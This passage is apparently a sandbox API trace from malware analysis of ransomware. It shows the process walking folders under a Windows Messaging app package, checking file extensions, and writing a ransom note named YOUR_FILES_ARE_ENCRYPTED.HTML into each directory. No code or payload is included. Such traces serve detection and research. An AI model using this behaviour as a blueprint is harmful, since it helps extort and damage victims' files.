lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.107] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.107] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 0 [0116.108] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.108] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.108] GetProcessHeap () returned 0x600000 [0116.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.108] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.109] CloseHandle (hObject=0x32c) returned 1 [0116.109] GetProcessHeap () returned 0x600000 [0116.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.109] GetProcessHeap () returned 0x600000 [0116.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.110] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.110] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.110] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp") returned 90 [0116.110] GetProcessHeap () returned 0x600000 [0116.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.111] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp" [0116.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.112] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.112] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 0 [0116.112] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.112] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0116.112] GetProcessHeap () returned 0x600000 [0116.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.113] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.113] CloseHandle (hObject=0x32c) returned 1 [0116.114] GetProcessHeap () returned 0x600000 [0116.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.114] GetProcessHeap () returned 0x600000 [0116.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.114] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.114] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.114] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0116.114] GetProcessHeap () returned 0x600000 [0116.114] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.114] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.115] CloseHandle (hObject=0x214) returned 1 [0116.115] GetProcessHeap () returned 0x600000 [0116.115] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.115] GetProcessHeap () returned 0x600000 [0116.115] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.116] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4327b09, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4327b09, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4327b09, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.117] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.117] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData") returned 90 [0116.117] GetProcessHeap () returned 0x600000 [0116.117] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.118] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData" [0116.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData\\*" [0116.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4327b09, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4327b09, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4327b09, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.118] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4327b09, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4327b09, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4327b09, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.118] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4327b09, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4327b09, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4327b09, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 0 [0116.118] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.118] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0116.118] GetProcessHeap () returned 0x600000 [0116.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.119] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.121] CloseHandle (hObject=0x214) returned 1 [0116.121] GetProcessHeap () returned 0x600000 [0116.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.121] GetProcessHeap () returned 0x600000 [0116.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.121] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4201430, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x36e4ad6b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36e4ad6b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.121] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.121] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache") returned 93 [0116.121] GetProcessHeap () returned 0x600000 [0116.121] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.121] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache" [0116.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\*" [0116.121] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4201430, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x36e4ad6b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36e4ad6b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.123] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4201430, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x36e4ad6b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36e4ad6b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.123] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27e76442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27e76442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3abf05c0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="MessagingBackgroundTaskLog.etl", cAlternateFileName="MESSAG~1.ETL")) returned 1 [0116.123] StrStrIW (lpFirst="MessagingBackgroundTaskLog.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.123] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\MessagingBackgroundTaskLog.etl") returned 124 [0116.123] PathFindExtensionW (pszPath="MessagingBackgroundTaskLog.etl") returned=".etl" [0116.123] lstrlenW (lpString=".etl") returned 4 [0116.123] PathFindExtensionW (pszPath="MessagingBackgroundTaskLog.etl") returned=".etl" [0116.123] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b327c48, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2bc64f47, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2bde25fe, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="PrivateTransportId.setting", cAlternateFileName="PRIVAT~1.SET")) returned 1 [0116.123] StrStrIW (lpFirst="PrivateTransportId.setting", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.123] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\PrivateTransportId.setting") returned 120 [0116.124] PathFindExtensionW (pszPath="PrivateTransportId.setting") returned=".setting" [0116.124] lstrlenW (lpString=".setting") returned 8 [0116.124] PathFindExtensionW (pszPath="PrivateTransportId.setting") returned=".setting" [0116.124] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e4ad6b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x36e4ad6b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36e4ad6b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="TransportIdList.setting", cAlternateFileName="TRANSP~1.SET")) returned 1 [0116.124] StrStrIW (lpFirst="TransportIdList.setting", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.124] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\TransportIdList.setting") returned 117 [0116.124] PathFindExtensionW (pszPath="TransportIdList.setting") returned=".setting" [0116.124] lstrlenW (lpString=".setting") returned 8 [0116.124] PathFindExtensionW (pszPath="TransportIdList.setting") returned=".setting" [0116.124] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e4ad6b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x36e4ad6b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36e4ad6b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="TransportIdList.setting", cAlternateFileName="TRANSP~1.SET")) returned 0 [0116.124] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.125] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0116.125] GetProcessHeap () returned 0x600000 [0116.125] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.126] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.127] CloseHandle (hObject=0x214) returned 1 [0116.127] GetProcessHeap () returned 0x600000 [0116.128] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.128] GetProcessHeap () returned 0x600000 [0116.128] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.128] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41af75f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af1c04d, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.128] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") 